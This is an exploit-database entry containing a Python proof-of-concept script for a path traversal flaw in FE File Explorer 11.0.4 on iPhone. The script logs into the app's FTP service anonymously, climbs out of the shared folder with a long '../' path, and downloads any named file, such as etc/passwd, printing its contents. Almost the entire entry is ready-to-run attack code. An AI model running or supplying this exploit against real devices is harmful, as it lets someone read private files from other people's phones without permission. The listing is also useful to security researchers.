Lucene search

K
zdtChokri Hammedi1337DAY-ID-37942
HistorySep 08, 2022 - 12:00 a.m.

FE File Explorer 11.0.4 Local File Inclusion Exploit

2022-09-0800:00:00
Chokri Hammedi
0day.today
193
# Exploit Title: FE File Explorer 11.0.4 Local File inclusion
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/fe-file-explorer-file-manager/id510282524
# Version: 11.0.4
# Tested on: iPhone ios 15.6


from ftplib import FTP
import argparse

help = " FE File Explorer Local File inclusion"
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--file", help="File To Open eg: etc/passwd")

args = parser.parse_args()


ip = args.target
port = 2121 # Default Port
files = args.file



ftpConnection = FTP()
ftpConnection.connect(host=ip, port=port)
ftpConnection.login();

def downloadFile():

ftpConnection.cwd('/../../../../../../../../../../../../../../../../')
        ftpConnection.retrbinary(f"RETR {files}", open('data.txt',
'wb').write)
        ftpConnection.close()
        file = open('data.txt', 'r')
        print (f"[***] The contents of {files}\n")
        print (file.read())

downloadFile()